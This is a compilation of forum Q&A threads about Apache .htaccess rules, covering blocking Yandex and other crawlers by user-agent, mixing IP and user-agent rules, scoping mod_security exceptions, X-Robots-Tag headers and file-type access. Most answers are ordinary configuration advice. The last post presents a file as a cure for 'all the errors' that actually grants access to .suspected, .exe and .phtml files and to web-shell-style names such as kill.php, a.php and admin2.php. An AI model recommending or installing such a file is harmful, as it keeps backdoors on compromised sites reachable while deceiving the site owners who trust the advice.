I'm trying to block Yandex from my site. I've tried the solutions posted in other threads, but they are not working, so I'm wondering if I am doing something wrong?
The user-agent string is:
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
I have tried the following (one at a time). RewriteEngine is on
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
Order Allow,Deny
Deny from env=bad_bot_block
Allow from ALL
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
<RequireAll>
Require all granted
Require not env bad_bot_block
</RequireAll>
Can anyone see a reason one of the above won't work or have any other suggestions?
In case anyone else has this problem, the following worked for me:
RewriteCond %{HTTP_USER_AGENT} ^.*(yandex).*$ [NC]
RewriteRule .* - [F,L]
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
With the start and end-of-string anchors in the regex, you are basically checking that the User-Agent string is exactly equal to "yandex.com" (except that the . matches any character), which clearly does not match the stated user-agent string.
You need to check that the User-Agent header contains "YandexBot" (or "yandex.com"). You can also use a case-sensitive match here, since the real Yandex bot does not vary the case.
For example, try the following instead:
SetEnvIf User-Agent "YandexBot" bad_bot_block
Consider using the BrowserMatch directive instead, which is a shortcut for SetEnvIf User-Agent.
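For example, the BrowserMatch equivalent of the above would be something like:

BrowserMatch "YandexBot" bad_bot_block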
If you are on Apache 2.4 then you should be using the Require (second) variant of your two code blocks. The Order, Deny and Allow directives are Apache 2.2 directives and are formally deprecated on Apache 2.4.
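Putting the corrected match together with the Require block from your question, a sketch of the Apache 2.4 version would be:

SetEnvIf User-Agent "YandexBot" bad_bot_block

<RequireAll>
Require all granted
Require not env bad_bot_block
</RequireAll>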
However, consider using robots.txt instead to block crawling in the first place. Yandex supposedly supports robots.txt.
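For example, a robots.txt in the document root along these lines should stop Yandex crawling the whole site, assuming the bot honours it:

User-agent: Yandex
Disallow: /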
Related
How do I block user agents and IPs AT THE SAME TIME?
Currently using this
SetEnvIfNoCase User-Agent "Chrome/80" good_ua
SetEnvIfNoCase User-Agent "Chrome/81" good_ua
SetEnvIfNoCase User-Agent "Chrome/82" good_ua
SetEnvIfNoCase User-Agent "Chrome/83" good_ua
order deny,allow
deny from all
allow from env=good_ua
That whitelists those UAs. But when I try adding this code:
deny from 1.1.1.1
deny from 1.0.0.1
only the UA-based blocking works; I cannot make them both work at the same time. I need to block IPs and allow certain UAs.
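One approach that might work here, sketched on the assumption that the goal is "allow only these UAs, but always block these IPs" (addresses taken from the question): keep the UA whitelist, then clear the good_ua flag again for the blocked IPs so the final allow never matches them.

SetEnvIfNoCase User-Agent "Chrome/80" good_ua
SetEnvIfNoCase User-Agent "Chrome/81" good_ua
SetEnvIfNoCase User-Agent "Chrome/82" good_ua
SetEnvIfNoCase User-Agent "Chrome/83" good_ua

# unset the flag again for IPs that should stay blocked regardless of UA
SetEnvIf Remote_Addr "^1\.1\.1\.1$" !good_ua
SetEnvIf Remote_Addr "^1\.0\.0\.1$" !good_ua

order deny,allow
deny from all
allow from env=good_ua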
My payment gateway is blocked by mod_security when trying to access the WooCommerce endpoint.
I'm receiving a 403 Permission Denied error when accessing the "/wc-api/my_gateway_payment_callback" endpoint.
I'm on a LiteSpeed shared host.
When I disable mod_security from .htaccess with:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
it solves the issue, but it exposes the WordPress admin to attacks, so I want to be more specific.
I tried to add a LocationMatch:
<LocationMatch "/wc-api/my_gateway_payment_callback">
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /wc-api/my_gateway_payment_callback/" \
    "phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
</LocationMatch>
or
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /my_gateway_payment_callback" \
    "phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
but they don't work and I'm still getting the 403 error.
I can spot multiple problems here:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Are you really using ModSecurity v1? That is VERY old and suggests you are using Apache 1, as ModSecurity v1 is not compatible with Apache 2. If not, this should be:
<IfModule mod_security2.c>
SecRuleEngine Off
</IfModule>
Next you say:
it solves the issue but exposes Wordpress admin to attacks
I don't see how it can solve the issue unless you are on REALLY old software, so I suspect this is a red herring.
so i want to be more specific. i tried to add a LocationMatch
Good idea to be more specific. However, LocationMatch runs quite late in the Apache process, after the ModSecurity rules will have run, so this will not work. You don't really need LocationMatch anyway, since your rule already scopes itself to that location. So let's look at the next two pieces:
SecRule REQUEST_URI "#beginsWith /wc-api/my_gateway_payment_callback/" \
    "phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
SecRuleRemoveById 3000
You shouldn't need to remove the rule if you allow it on the previous lines. Typically you would only do one or the other.
or
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /my_gateway_payment_callback" \
    "phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
but they don't work and I'm still getting the 403 error.
You have pass (which means continue on to the next rule) and allow (which means skip all future rules). It seems to me you only want the latter and not the former. As these are conflicting, I suspect ModSecurity will action the former first, which is why it is not working.
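In other words, if ModSecurity directives are accepted in this context at all, a sketch of your rule with only allow kept would be roughly the following (note the operator prefix should be @; written with # the whole second argument would just be treated as a regular expression):

SecRule REQUEST_URI "@beginsWith /wc-api/my_gateway_payment_callback/" \
    "phase:2,id:1000,nolog,allow,msg:'Update URI accessed'"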
However, the better way is to look at the Apache error logs to see which rule it's failing on (is it rule 3000, as per your other LocationMatch workaround?) and just disable that one rule, rather than disabling all rules for that route.
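So, assuming the log really does point at rule 3000 (that ID is only taken from your workaround) and your host permits ModSecurity directives in .htaccess, the targeted fix would replace the blanket SecRuleEngine Off block with something like:

<IfModule mod_security2.c>
SecRuleRemoveById 3000
</IfModule>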
So, all in all, I'm pretty confused by your question, as there seem to be a lot of inconsistencies and things that are just wrong in there...
I am so tired of Yandex, Baidu, and MJ12bot eating all my bandwidth. None of them even care about the useless robots.txt file.
I would also like to block any user-agent with the word "spider" in it.
I have been using the following code in my .htaccess file to look at the user-agent string and block them that way but it seems they still get through. Is this code correct? Is there a better way?
BrowserMatchNoCase "baidu" bots
BrowserMatchNoCase "yandex" bots
BrowserMatchNoCase "spider" bots
BrowserMatchNoCase "mj12bot" bots
Order Allow,Deny
Allow from ALL
Deny from env=bots
To block user agents, you can use:
SetEnvIfNoCase User-agent (yandex|baidu|foobar) not-allowed=1
Order Allow,Deny
Allow from ALL
Deny from env=not-allowed
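If the server is running Apache 2.4, the equivalent with the newer access-control directives would presumably be the following (Order/Allow/Deny are the old 2.2 directives):

SetEnvIfNoCase User-Agent (yandex|baidu|spider|mj12bot) not-allowed

<RequireAll>
Require all granted
Require not env not-allowed
</RequireAll>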
Can I 'noindex, follow' a specific page using X-Robots-Tag in .htaccess?
I've found some instructions for noindexing types of files, but I can't find instruction to noindex a single page, and what I have tried so far hasn't worked.
This is the page I'm looking to noindex:
http://www.examplesite.com.au/index.php?route=news/headlines
This is what I have tried so far:
<FilesMatch "/index.php?route=news/headlines$">
Header set X-Robots-Tag "noindex, follow"
</FilesMatch>
Thanks for your time.
It seems to be impossible to match the request parameters from within a .htaccess file. Here is a list of what you can match against: http://httpd.apache.org/docs/2.2/sections.html
It will be much easier to do it in your script. If you are running PHP, try:
header('X-Robots-Tag: noindex, follow');
You can easily build conditions on $_GET, REQUEST_URI and so on.
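For this particular URL, a minimal sketch of that check near the top of index.php (assuming the route really does arrive as $_GET['route']) could be:

// send the header only for the news/headlines route
if (isset($_GET['route']) && $_GET['route'] === 'news/headlines') {
    header('X-Robots-Tag: noindex, follow');
}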
RewriteEngine on
RewriteBase /
#set env variable if url matches
RewriteCond %{QUERY_STRING} ^route=news/headlines$
RewriteRule ^index\.php$ - [env=NOINDEXFOLLOW:true]
#only send header if env variable set
Header set X-Robots-Tag "noindex, follow" env=NOINDEXFOLLOW
FilesMatch works on (local) files, not URLs, so it would try to match only the /index.php part of the URL. <Location> would be more appropriate, but as far as I can read from the documentation, query strings are not allowed there. So I ended up with the above solution (I really liked this challenge). PHP would be the more obvious place to put this, but that is up to you.
The solution requires mod_rewrite, and mod_headers of course.
Note that you'll need the mod_headers module enabled to set the headers.
Though like others have said, it seems better to use the php tag. Does that not work?
According to Google the syntax would be a little different:
<Files ~ "\.pdf$">
Header set X-Robots-Tag "noindex, nofollow"
</Files>
https://developers.google.com/webmasters/control-crawl-index/docs/robots_meta_tag
I saw several .htaccess examples disabling access to some files:
<Files ~ "\.(js|sql)$">
order deny,allow
deny from all
</Files>
For example, this prevents access to all .JS and .SQL files; the others are enabled. I want the contrary! I want those files to be ENABLED and all others to be prevented. How do I achieve this?
Vorapsak's answer is almost correct. It's actually
order allow,deny
<Files ~ "\.(js|sql)$">
allow from all
</Files>
You need the order directive at the top (and you don't need anything else).
The interesting thing is, it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.
and a bit of explanation:
The Order clause tells the server about its expected default behaviour. The
order allow,deny
tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaluated: if a request matches any deny directives, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.
The directive
order deny,allow
works the opposite way: first the server processes the "deny" directives: if a request matches, it's marked to be denied. Then the "allow" directives are evaluated: if a request matches an allow directive, it's allowed in, even if it matches a deny directive earlier. If a request matches nothing, the file is allowed.
In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.
If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.
Oh, and one more thing: directives in a section (i.e. <Files> and <Directory>) are always evaluated after the main body of the .htaccess file, overriding it. That's why Vorapsak's solution did not work as intended: the main .htaccess denied the request, then the <Files> section was processed, and it allowed the request.
Htaccess is magic of the worst kind, but there's logic to it.
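For what it's worth, on Apache 2.4 the same "deny everything except .js and .sql" behaviour should be achievable with the newer Require directives, roughly:

Require all denied

<Files ~ "\.(js|sql)$">
Require all granted
</Files>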
Did you try setting a
deny from all
outside (before) the tag, then changing the
deny from all
to
allow from all
inside? Something like
deny from all
<Files ~ "\.(js|sql)$">
order allow,deny
allow from all
</Files>
If you are having trouble with your website, use this .htaccess code. It solves all the errors you are likely to encounter.
DirectoryIndex index.html index.php
<FilesMatch "\.(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store)\.php$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If this helps you, don't forget to give it a thumbs up!!!